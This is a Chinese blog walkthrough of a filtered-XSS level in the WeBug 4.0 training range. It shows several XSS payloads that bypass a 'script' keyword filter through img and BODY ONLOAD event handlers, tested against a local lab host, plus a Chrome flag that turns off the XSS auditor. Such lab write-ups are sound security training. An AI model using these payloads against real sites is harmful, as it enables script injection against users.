webug 4.0 第十三关 过滤xss

感谢webug团队一直以来的更新维护!

webug是什么

WeBug名称定义为“我们的漏洞”靶场环境基础环境是基于PHP/mysql制作搭建而成,中级环境与高级环境分别都是由互联网漏洞事件而收集的漏洞存在的操作环境。部分漏洞是基于Windows操作系统的漏洞所以将WeBug的web环境都装在了一个纯净版的Windows 2003的虚拟机中。

Webug官网:http://www.webug.org

Webug 4.0百度云地址: https://pan.baidu.com/s/1euUY4UG43BuOjhPqkJBvcw 提取码: 3xpy

来源:226安全团队

微信号:safeteam226

开始打靶

废话不多说,直接开始。

1、访问http://192.168.136.130/control/xss/filter_xss.php?id=<(去掉这个)script>alert(‘XSS’)</(去掉这个)script>
在这里插入图片描述
既然说是恶意函数的话,可能检测到了script,可能检测到了alert,也可能是两者一起。接下来就一一排除

2、访问:?id=<(去掉这个)script></(去掉这个)script>,失败

3、访问:?id=alert(‘XSS’),成功

可以确定是检测到了script这个字符串,接下来让我们尝试绕过

大小写绕过:?id=<(去掉这个)ScRipt>alert(‘XSS’)</(去掉这个)ScRipt>,失败

unicode编码绕过:?id=在这里插入图片描述,失败,不支持这个编码呢

看来没法了,面对这种情况就采用DOM xss的方法吧

4、查看网页源代码,查看xss的位置
在这里插入图片描述
5、根据观察构造xss语句,比如这里就可以
访问:?id=<(去掉这个)img src=1 alert(1)>,成功
访问:?id=<(去掉这个)BODY ONLOAD=alert(1)>,成功
6、学习:百度谷歌“XSS平台”,里面有很多你知道以及不知道的姿势
7、注意:谷歌浏览器有xss检测,在快捷方式后面加上–args --disable-xss-auditor
在这里插入图片描述

  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值